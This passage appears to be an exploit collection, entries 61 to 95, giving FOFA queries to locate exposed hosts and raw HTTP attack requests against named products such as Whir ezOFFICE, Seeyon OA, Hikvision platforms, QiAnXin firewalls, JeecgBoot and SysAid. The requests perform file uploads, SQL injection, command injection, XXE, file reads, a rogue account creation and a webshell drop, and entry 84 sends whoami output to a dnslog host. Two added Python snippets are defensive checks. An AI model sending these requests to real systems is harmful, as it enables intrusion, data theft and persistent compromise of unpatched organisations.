Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 (Whir) ezOFFICE collaborative management platform SendFileCheckTemplateEdit.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122 that the injected HashBytes() call makes the database compute) confirm the vulnerability.
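The hash-marker payloads of entries 57, 58 and 66 all work the same way: the tester picks a seed, the injected SELECT makes SQL Server compute MD5 of that seed, and the digest shows up in the page only if the SQL actually ran. The expected string can therefore be derived locally and searched for instead of eyeballing the response, and the WAITFOR DELAY probes of entries 64, 68, 69 and 71 are confirmed the same way by timing against a baseline request. The following Python is an added example written for this page, not code from the original post or from any of the products listed; the sample response body is constructed, not captured from a real system.

```python
import hashlib
import re


def expected_md5_marker(seed: str) -> str:
    """Lower-case hex digest of hashbytes('MD5', seed) as SQL Server computes it, without the 0x prefix."""
    return hashlib.md5(seed.encode("utf-8")).hexdigest()


def response_confirms_injection(body: str, seed: str) -> bool:
    """True when the response carries the MD5 of the seed, which only happens if the injected
    SELECT was executed. sys.fn_varbintohexstr() / sys.fn_sqlvarbasetostr() render the varbinary
    as 0x<hex>, so accept the digest with or without the prefix, in either case."""
    return re.search(r"(?:0x)?" + expected_md5_marker(seed), body, re.IGNORECASE) is not None


def delay_confirms_injection(baseline_seconds: float, probe_seconds: float, delay_seconds: float = 5.0) -> bool:
    """For WAITFOR DELAY '0:0:5' probes: the probe must take roughly delay_seconds longer than an
    otherwise identical request without the payload. Comparing against a measured baseline rather
    than an absolute threshold avoids false positives on a host that is simply slow."""
    return (probe_seconds - baseline_seconds) >= 0.9 * delay_seconds


# Constructed sample: an error-based response produced when the injected hashbytes() value is
# compared with an integer (the 'AND 1 IN (SELECT ...)' form used in entry 58).
SAMPLE_BODY = (
    '<html><body><span id="lblErr">Conversion failed when converting the varchar value '
    "'0xE10ADC3949BA59ABBE56E057F20F883E' to data type int.</span></body></html>"
)

if __name__ == "__main__":
    print(expected_md5_marker("123456"))
    print(response_confirms_injection(SAMPLE_BODY, "123456"))
    print(delay_confirms_injection(0.4, 5.6))
```

Use a seed that cannot occur naturally in the page (a random digit string rather than 123456) so a stale cached hash or an unrelated hex token cannot produce a false positive.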
67. 万户 (Whir) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and filename give the name of the written file, dir the directory it is written to, and fileType its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp
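What entries 61, 67, 80 and 87 have in common is that a request-controlled directory, file name and extension are concatenated onto a server path, so dir=../platform/portal/layout/ plus fileType=.jsp lands a JSP inside the web root. The following Python is an added example, not code from the page or from any of the vendors, that shows that pattern next to a hardened resolver: an allow-listed extension, a file name restricted to a single path component, and a realpath() containment check against the intended upload directory. The web-root and upload-directory values are assumptions chosen to mirror entry 67.

```python
import os
import posixpath

# Assumed allow-list for a document-upload endpoint; executable server-side types stay out.
ALLOWED_EXT = {".doc", ".docx", ".xls", ".xlsx", ".pdf"}


def vulnerable_resolved(webroot: str, dir_param: str, name: str, ext: str) -> str:
    """The vulnerable pattern: user input joined straight onto the server path. Normalised here
    only to show where the write really goes (posixpath so the result is the same on any OS)."""
    return posixpath.normpath(posixpath.join(webroot, dir_param, name + ext))


def hardened_target(webroot: str, upload_dir: str, dir_param: str, name: str, ext: str) -> str:
    """Resolve the write path only if (1) the extension is allow-listed, (2) the name is a single
    path component and (3) the resolved real path is still under webroot/upload_dir.
    Raises ValueError otherwise. realpath() also defeats symlink tricks inside the upload tree."""
    if ext.lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    if not name or name in (".", "..") or set(name) & set("/\\\x00"):
        raise ValueError("file name must be a single path component: %r" % name)
    base = os.path.realpath(os.path.join(webroot, upload_dir))
    candidate = os.path.realpath(os.path.join(base, dir_param, name + ext))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes %s: %s" % (base, candidate))
    return candidate


def hardened_accepts(webroot: str, upload_dir: str, dir_param: str, name: str, ext: str) -> bool:
    """True if hardened_target() would write the file, False if it rejects the request."""
    try:
        hardened_target(webroot, upload_dir, dir_param, name, ext)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Entry 67's parameters against an assumed deployment under /srv/defaultroot.
    print(vulnerable_resolved("/srv/defaultroot/upload", "../platform/portal/layout/", "apoxkq", ".jsp"))
    print(hardened_accepts("/srv/defaultroot", "upload", "../platform/portal/layout/", "apoxkq", ".jsp"))
    print(hardened_accepts("/srv/defaultroot", "upload", "2024/05", "report", ".pdf"))
```

The containment check compares realpath() results, not the raw strings, so an upload directory that is itself a symlink, or a sub-directory the attacker can influence, still resolves to the same base. The extension test runs first because it is the cheapest and because a traversal with a harmless extension is still a write outside the intended tree.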
68. 万户 (Whir) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 (Whir) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 (Whir) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
The SID header is base64; dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue decoded:
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<Signature><Field><a Index="ProtectItem">true</a><b Index="Caption">caption</b><c Index="ID">id</c><d Index="VALUE">&xxe;</d></Field></Signature>

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the command wrote:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
The UnitCode value is a FreeMarker template; the ?new() built-in instantiates freemarker.template.utility.Execute, which runs the string it is given as a system command.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then request the file the command wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the uploaded file:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视 (Uniview) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql value is a FreeMarker template, same technique as entry 76: ?new() instantiates freemarker.template.utility.Execute and the string passed to it runs as a system command.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request /jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
The type parameter decodes to a newline followed by: echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request /txzfsrur.php (the file the injected command appends to)

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 47
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson-based command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QiAnXin) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 (QiAnXin) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then request the uploaded file:

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
